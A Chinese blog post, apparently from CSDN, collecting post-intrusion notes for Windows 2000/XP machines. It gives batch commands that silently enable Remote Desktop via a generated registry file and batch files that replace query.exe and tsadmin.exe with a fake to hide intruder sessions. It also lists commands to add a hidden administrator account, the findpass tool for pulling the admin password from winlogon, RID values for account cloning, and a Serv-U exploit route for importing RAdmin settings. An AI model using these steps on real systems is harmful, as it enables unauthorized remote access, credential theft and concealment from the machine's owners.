关闭

2000 XP 开3389

489人阅读 评论(0) 收藏 举报
 

HTML Tags and JavaScript tutorial



2000 XP 开3389





echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>> 3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
 regedit /s 3389.reg
列举进程的脚本。
 
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts://./root/cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript ps.vbs
ntsd -c q -p 200
 
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
regedit /s 3389.reg
查询终端服务端口:reg query "HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/WinStations/RDP-TCP-PortNumber"
 
 
登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
@copy c:/winnt/system32/query.exe c:/winnt/system32/com/1/que.exe
@del c:/winnt/system32/query.exe
@del %SYSTEMROOT%/system32/dllcache/query.exe
@copy c:/winnt/system32/com/1/query.exe c:/winnt/system32/query.exe //复制一个假的
@echo off
@copy c:/winnt/system32/tsadmin.exe c:/winnt/system32/com/1/tsadmin.exe
@del c:/winnt/system32/tsadmin.exe
@del %SYSTEMROOT%/system32/dllcache/tsadmin.exe
 
 
 
一些很有用的老知识
type c:/boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8
如果对方没开3389,但是装了Remote Administrator Service
用这个命令F:/ftp.exe "regedit -s F:/longyi.biz/RAdmin.reg" 连接
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:/ftp.exe "regedit -e F:/1.reg HKEY_LOCAL_MACHINE/SYSTEM/RAdmin"
 


0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:150517次
    • 积分:4028
    • 等级:
    • 排名:第7684名
    • 原创:242篇
    • 转载:0篇
    • 译文:0篇
    • 评论:16条
    文章存档
    最新评论